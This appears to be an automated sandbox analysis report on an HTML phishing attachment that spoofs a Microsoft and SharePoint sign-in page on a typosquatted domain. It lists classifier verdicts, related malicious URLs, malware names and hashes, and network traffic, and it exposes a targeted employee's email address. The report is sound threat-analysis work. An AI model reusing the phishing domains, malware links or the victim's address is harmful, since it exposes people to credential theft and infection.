Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, time.windows.com, a1894.dscb.akamai.net, clients2.google.com, login.live.com, update.googleapis.com, optimizationguide-pa.googleapis.com, clients1.google.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Technical Details & Profile Illustrations for This#U00a0Drygair.html

Input	Output
URL: https://msonlineauthenticator.top Model: Joe Sandbox AI	{ "typosquatting": true, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": true, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": true, "third_party_hosting": true }
URL: https://msonlineauthenticator.top
URL: :// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: ://
URL: file:///C:/Users/user/Desktop/Technical%20Details%20&%20%20Profile%20Illustrations%20for%20This%23U00a0Drygair.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Download", "prominent_button_name": "Download All", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: file:///C:/Users/user/Desktop/Technical%20Details%20&%20%20Profile%20Illustrations%20for%20This%23U00a0Drygair.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Download", "prominent_button_name": "Download All", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: file:///C:/Users/user/Desktop/Technical%20Details%20&%20%20Profile%20Illustrations%20for%20This%23U00a0Drygair.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft", "SharePoint" ] }
	{ "brands": [ "Microsoft", "SharePoint" ] }
URL: file:///C:/Users/user/Desktop/Technical%20Details%20&%20%20Profile%20Illustrations%20for%20This%23U00a0Drygair.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft", "SharePoint" ] }
	{ "brands": [ "Microsoft", "SharePoint" ] }
URL: file:///C:/Users/user/Desktop/Technical%20Details%20&%20%20Profile%20Illustrations%20for%20This%23U00a0Drygair.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sorry, your sign-in timed out, Please sign in again.", "prominent_button_name": "Sign in", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: file:///C:/Users/user/Desktop/Technical%20Details%20&%20%20Profile%20Illustrations%20for%20This%23U00a0Drygair.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sorry, your sign-in timed out, Please sign in again.", "prominent_button_name": "Sign in", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: file:///C:/Users/user/Desktop/Technical%20Details%20&%20%20Profile%20Illustrations%20for%20This%23U00a0Drygair.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft", "SharePoint" ] }
	{ "brands": [ "Microsoft", "SharePoint" ] }
URL: file:///C:/Users/user/Desktop/Technical%20Details%20&%20%20Profile%20Illustrations%20for%20This%23U00a0Drygair.html Model: Joe Sandbox AI	{ "brands": [ "Microsoft", "SharePoint" ] }
	{ "brands": [ "Microsoft", "SharePoint" ] }
URL: https://login.msonlineauthenticator.top/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Trying to sign you in", "prominent_button_name": "cancel", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://login.msonlineauthenticator.top/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://login.msonlineauthenticator.top/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sign in", "prominent_button_name": "Next", "text_input_field_labels": [ "cesar.lopez@royalbrinkman.com" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://login.msonlineauthenticator.top/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://login.msonlineauthenticator.top/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.msonlineauthenticator.top' does not match the legitimate domain 'microsoft.com'.", "The domain uses 'msonlineauthenticator.top', which is not a recognized Microsoft domain and includes suspicious elements such as 'authenticator' and the unusual '.top' extension.", "The presence of 'msonline' in the domain could be an attempt to mimic Microsoft's legitimate services like 'msn.com' or 'microsoftonline.com'.", "The use of a top-level domain '.top' is unusual for a well-known brand like Microsoft, which typically uses '.com'.", "The email domain 'royalbrinkman.com' does not match the brand 'Microsoft', which could indicate a phishing attempt targeting users of a specific organization." ], "riskscore": 9} Google indexed: False
URL: login.msonlineauthenticator.top Brands: Microsoft Input Fields: cesar.lopez@royalbrinkman.com
URL: Webpage/Document Model: Joe Sandbox AI	{"classification":"Corporate Data Theft"}
	{"classification":"Corporate Data Theft"}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.246.63	https://reauth.oceanagolds.com	Get hash	malicious	CorporateDataTheft, HTMLPhisher	Browse
	https://ch.bing.com/ck/a?!&&p=de01397e8e89421aJmltdHM9MTY5ODcxMDQwMCZpZ3VpZD0yNTA1NWYyZi1hMDEzLTY3ZTQtMmY0Yy00Yzk0YTEwMTY2MGYmaW5zaWQ9NTE3Nw&ptn=3&ver=2&hsh=3&fclid=25055f2f-a013-67e4-2f4c-4c94a101660f&u=a1aHR0cHM6Ly9mY2Z0YS5jb20vZW5zLw#Ym93ZW4uemhlbmdAb2FrbGV5Y2FwaXRhbC5jb20=	Get hash	malicious	HTMLPhisher	Browse
	https://oce.dzpvwobr.ru/vGysgPt/	Get hash	malicious	Unknown	Browse
	valid.sh.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=true	Get hash	malicious	EvilProxy, HTMLPhisher	Browse
151.101.193.229	https://taxjusticeafrica.net/resources/blog/lopsided-global-financial-system-leaves-many-african-states-debt-distress	Get hash	malicious	Unknown	Browse
	http://www.urbanerecycling.com	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse
	http://www.kalenderpedia.de	Get hash	malicious	Unknown	Browse
	http://ppc-overwatch.com	Get hash	malicious	Unknown	Browse
	https://365214tesauppeortbasd132.z26.web.core.windows.net/#	Get hash	malicious	TechSupportScam	Browse
	https://momentum-energy-4688.my.salesforce-sites.com/support	Get hash	malicious	Unknown	Browse
	https://files-pdf-73j.pages.dev/?e=info@camida.com	Get hash	malicious	Unknown	Browse
	https://www.google.es/url?q=queryrp18(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fpreview.adope.jp%2fod%2f8gqnmo6zgfuuc6sej4k7rfdswihr8l%2fZnJhbnMuZW5nZWxicmVjaHRAYXJkYWdoZ3JvdXAuY29t$?	Get hash	malicious	Unknown	Browse
	Unit 2_week 4 2024.pptx	Get hash	malicious	HTMLPhisher	Browse
	https://bbva-es.ayuda-acceso.com	Get hash	malicious	Unknown	Browse
151.101.129.229	http://valleyprohealth.org	Get hash	malicious	Unknown	Browse	cdn.jsdelivr.net/jquery.slick/1.5.1/slick-theme.css
34.117.59.81	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip
	build.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	YjcgpfVBcm.bat	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	lePDF.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	6Mpsoq1.php.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	Evjm8L1nEb.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	Pe4905VGl1.bat	Get hash	malicious	AsyncRAT	Browse	34.117.59.81
	Evjm8L1nEb.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	mDHwap5GlV.exe	Get hash	malicious	LummaC Stealer	Browse	34.117.59.81
	SystemCoreHelper.dll	Get hash	malicious	LummaC Stealer	Browse	34.117.59.81
	y.bat	Get hash	malicious	Braodo	Browse	34.117.59.81
	https://fxwf9-53194.portmap.io:53194/?x=sb232111	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://trimmer.to:443/GWHMY	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	bose18mkt.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
	hnbose1711.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
jsdelivr.map.fastly.net	https://taxjusticeafrica.net/resources/blog/lopsided-global-financial-system-leaves-many-african-states-debt-distress	Get hash	malicious	Unknown	Browse	151.101.193.229
	http://www.urbanerecycling.com	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	151.101.65.229
	http://www.kalenderpedia.de	Get hash	malicious	Unknown	Browse	151.101.193.229
	http://ppc-overwatch.com	Get hash	malicious	Unknown	Browse	151.101.193.229
	http://mike@mikestavlund.com	Get hash	malicious	Unknown	Browse	151.101.129.229
	https://365214tesauppeortbasd132.z26.web.core.windows.net/#	Get hash	malicious	TechSupportScam	Browse	151.101.193.229
	http://nemoinsure.com	Get hash	malicious	Unknown	Browse	151.101.1.229
	ACH-information-Ag.pdf.html	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	https://momentum-energy-4688.my.salesforce-sites.com/support	Get hash	malicious	Unknown	Browse	151.101.193.229
	http://mt6j71.p1keesoulharmony.com/	Get hash	malicious	HTMLPhisher, EvilProxy	Browse	151.101.1.229
sni1gl.wpc.omegacdn.net	https://reauth.oceanagolds.com	Get hash	malicious	CorporateDataTheft, HTMLPhisher	Browse	152.199.21.175
	https://ch.bing.com/ck/a?!&&p=de01397e8e89421aJmltdHM9MTY5ODcxMDQwMCZpZ3VpZD0yNTA1NWYyZi1hMDEzLTY3ZTQtMmY0Yy00Yzk0YTEwMTY2MGYmaW5zaWQ9NTE3Nw&ptn=3&ver=2&hsh=3&fclid=25055f2f-a013-67e4-2f4c-4c94a101660f&u=a1aHR0cHM6Ly9mY2Z0YS5jb20vZW5zLw#Ym93ZW4uemhlbmdAb2FrbGV5Y2FwaXRhbC5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://oce.dzpvwobr.ru/vGysgPt/	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.org	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://myworkspaceb7705.myclickfunnels.com/ville-de-rouyn-noranda	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	152.199.21.175
	https://tmacog-my.sharepoint.com/:f:/g/personal/bechsteinm_tmacog_org/EhlK4Xsd02RCkKBp5naSkjkBOE0y5JIGJchJIGq_xqq50Q?e=5%3abaznzS&at=9&xsdata=MDV8MDJ8Ymhvb3BlckBiZ3N1LmVkdXwxYTg0MTFlMjdjMzQ0NWU4MTcwZjA4ZGQwZDZiOGQzM3xjZGNiNzI5ZDUxMDY0ZDdjYjc1YmEzMGM0NTVkNWIwYXwwfDB8NjM4NjgxNDc3ODAwNDk3OTg2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=VldHeThDNE1GNDFhUVA3VUJFZzEwL2JHVDN6U1BIcVM3bzE4cklKOGVJbz0%3d&clickparams=eyAiWC1BcHBOYW1lIiA6ICJNaWNyb3NvZnQgT3V0bG9vayIsICJYLUFwcFZlcnNpb24iIDogIjE2LjAuMTczMjguMjA2MTIiLCAiT1MiIDogIldpbmRvd3MiIH0%3D	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	http://www.urbanerecycling.com	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	152.199.21.175
	https://ymcajeffco-my.sharepoint.com/:u:/g/personal/rcampbell_mtvernonymca_org/Eb_PxgSrk7VCrlppYfmkXowB9vCdCR2cgdVG8AQkH7BcbQ?e=b9efJ2	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docx	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://vectaire.doclawfederal.com/uDLtT/	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	https://ch.bing.com/ck/a?!&&p=de01397e8e89421aJmltdHM9MTY5ODcxMDQwMCZpZ3VpZD0yNTA1NWYyZi1hMDEzLTY3ZTQtMmY0Yy00Yzk0YTEwMTY2MGYmaW5zaWQ9NTE3Nw&ptn=3&ver=2&hsh=3&fclid=25055f2f-a013-67e4-2f4c-4c94a101660f&u=a1aHR0cHM6Ly9mY2Z0YS5jb20vZW5zLw#Ym93ZW4uemhlbmdAb2FrbGV5Y2FwaXRhbC5jb20=	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	gr5zS9wytq.bat	Get hash	malicious	Unknown	Browse	185.199.111.133
	gr5zS9wytq.bat	Get hash	malicious	Unknown	Browse	185.199.110.133
	based.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse	185.199.110.133
	https://oce.dzpvwobr.ru/vGysgPt/	Get hash	malicious	Unknown	Browse	151.101.2.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
MICROSOFT-CORP-MSN-AS-BLOCKUS	test11.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test19.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test14.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test22.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test16.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test9.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test_again2.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test_again3.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test8.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
	test23.exe	Get hash	malicious	CobaltStrike	Browse	20.83.148.22
FASTLYUS	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	https://ch.bing.com/ck/a?!&&p=de01397e8e89421aJmltdHM9MTY5ODcxMDQwMCZpZ3VpZD0yNTA1NWYyZi1hMDEzLTY3ZTQtMmY0Yy00Yzk0YTEwMTY2MGYmaW5zaWQ9NTE3Nw&ptn=3&ver=2&hsh=3&fclid=25055f2f-a013-67e4-2f4c-4c94a101660f&u=a1aHR0cHM6Ly9mY2Z0YS5jb20vZW5zLw#Ym93ZW4uemhlbmdAb2FrbGV5Y2FwaXRhbC5jb20=	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	gr5zS9wytq.bat	Get hash	malicious	Unknown	Browse	185.199.111.133
	gr5zS9wytq.bat	Get hash	malicious	Unknown	Browse	185.199.110.133
	based.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse	185.199.110.133
	https://oce.dzpvwobr.ru/vGysgPt/	Get hash	malicious	Unknown	Browse	151.101.2.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
AMAZON-AESUS	la.bot.arm6.elf	Get hash	malicious	Unknown	Browse	54.17.151.136
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	34.225.176.94
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	3.217.99.99
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	23.20.181.132
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	54.136.159.35
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	100.25.184.133
	https://taxjusticeafrica.net/resources/blog/lopsided-global-financial-system-leaves-many-african-states-debt-distress	Get hash	malicious	Unknown	Browse	3.5.24.58
	D2pQ4J4GGZ.exe	Get hash	malicious	Remcos, DBatLoader	Browse	3.5.29.78
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	44.221.84.105
	fbot.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	54.7.75.208

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	A3dN9SkGgp.exe	Get hash	malicious	Heda	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	https://reauth.oceanagolds.com	Get hash	malicious	CorporateDataTheft, HTMLPhisher	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	https://ch.bing.com/ck/a?!&&p=de01397e8e89421aJmltdHM9MTY5ODcxMDQwMCZpZ3VpZD0yNTA1NWYyZi1hMDEzLTY3ZTQtMmY0Yy00Yzk0YTEwMTY2MGYmaW5zaWQ9NTE3Nw&ptn=3&ver=2&hsh=3&fclid=25055f2f-a013-67e4-2f4c-4c94a101660f&u=a1aHR0cHM6Ly9mY2Z0YS5jb20vZW5zLw#Ym93ZW4uemhlbmdAb2FrbGV5Y2FwaXRhbC5jb20=	Get hash	malicious	HTMLPhisher	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	hTtP://w0.pM:8080/	Get hash	malicious	Unknown	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	https://oce.dzpvwobr.ru/vGysgPt/	Get hash	malicious	Unknown	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	valid.sh.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	https://www.tuseguro.com/10494737544205	Get hash	malicious	Unknown	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109
	https://taxjusticeafrica.net/resources/blog/lopsided-global-financial-system-leaves-many-african-states-debt-distress	Get hash	malicious	Unknown	Browse	23.52.182.8 172.202.163.200 13.107.246.63 184.30.24.109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (60356)
Category:	dropped
Size (bytes):	60635
Entropy (8bit):	5.158710529058039
Encrypted:	false
SSDEEP:	768:WkN++EvGHWyOOY/uwAxOlU5iBNY5XPxyvTPBVRKwi/C9rfz7uxk6yH8Xae53XC7e:W0xY+t/Nhho1d76KV2O9Ed
MD5:	4800BCC26467D999F49B472F02906B8D
SHA1:	2C6C0A58345A09D3761230AF823A4E4852B12643
SHA-256:	DE040986D9A3ED89D5D5F9AD6D5727015E9E238C2CD13AF8F1B55909386D0864
SHA-512:	CA4675410AF4272FF8664BCABAA5A7E2217796A3D9CA28FD891BFAB06A8B45D4CF918EBD617EBEEF0BD51A6B1D05B8887CDFFC39DB08EC70018EF12893A668A5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	/!. Bootstrap v5.3.3 (https://getbootstrap.com/). * Copyright 2011-2024 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("@popperjs/core")):"function"==typeof define&&define.amd?define(["@popperjs/core"],e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).bootstrap=e(t.Popper)}(this,(function(t){"use strict";function e(t){const e=Object.create(null,{[Symbol.toStringTag]:{value:"Module"}});if(t)for(const i in t)if("default"!==i){const s=Object.getOwnPropertyDescriptor(t,i);Object.defineProperty(e,i,s.get?s:{enumerable:!0,get:()=>t[i]})}return e.default=t,Object.freeze(e)}const i=e(t),s=new Map,n={set(t,e,i){s.has(t)\|\|s.set(t,new Map);const n=s.get(t);n.has(e)\|\|0===n.size?n.set(e,i):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Arr

File type:	HTML document, ASCII text
Entropy (8bit):	4.168591616789946
TrID:
File name:	Technical Details & Profile Illustrations for This#U00a0Drygair.html
File size:	1'699 bytes
MD5:	8ce7ec9b56bc729e732e02e4720d13f5
SHA1:	d490375e077017a08b4369f94bd03076c2e3d5a3
SHA256:	2c6ed43c9fc53676971af5601ed581cdfc037bab694894b2538f3a37dde7e087
SHA512:	73e52401a212d7e1893a07cb4a4b9687036bec27c651dd6c8429a40469cd37495e1bbcc2757c95bac0c9ed4e17f8f117ebf508c139ad14efdf43dcfa6aff2cb2
SSDEEP:	24:BEGC+iscxfZuZV8g+TY+nZrV8ADHVVV8Z4FHRP0VVV8uAPK6NVVV8nVV/jGUMVo7:pQZQuNnZr9fXxPwJAC0or5
TLSH:	0231AF971CF09AAB230099D533E5F10ECEB1E6176288C854F5DD52A90F81BDDCCE7924
File Content Preview:	<!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <meta http-equiv="X-UA-Compatible" content="IE=edge">.

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 13:43:21.813908100 CET	123	123	192.168.2.7	40.81.94.65
Nov 26, 2024 13:43:22.370433092 CET	123	123	40.81.94.65	192.168.2.7
Nov 26, 2024 13:43:24.317791939 CET	53	65509	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:24.688343048 CET	59238	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:24.688683033 CET	51670	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:24.690080881 CET	58563	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:24.690242052 CET	60652	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:24.830598116 CET	53	59541	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:24.866075039 CET	53	59238	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:24.867002010 CET	53	51670	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:24.902257919 CET	55265	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:25.042438984 CET	53	55265	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:25.245881081 CET	53	58563	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:25.245934010 CET	53	60652	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:27.350573063 CET	57483	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:27.350792885 CET	63343	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:27.490644932 CET	53	57483	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:27.493593931 CET	53	63343	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:27.661614895 CET	53	56598	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:28.116214037 CET	64624	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:28.116350889 CET	60555	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:28.137522936 CET	65446	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:28.138031006 CET	58548	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:28.283499956 CET	53	65446	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:28.283555031 CET	53	58548	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:28.595249891 CET	53	64624	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:28.595565081 CET	53	60555	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:32.362221956 CET	55301	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:32.363183022 CET	51055	53	192.168.2.7	1.1.1.1
Nov 26, 2024 13:43:32.501482010 CET	53	55301	1.1.1.1	192.168.2.7
Nov 26, 2024 13:43:32.503334999 CET	53	51055	1.1.1.1	192.168.2.7
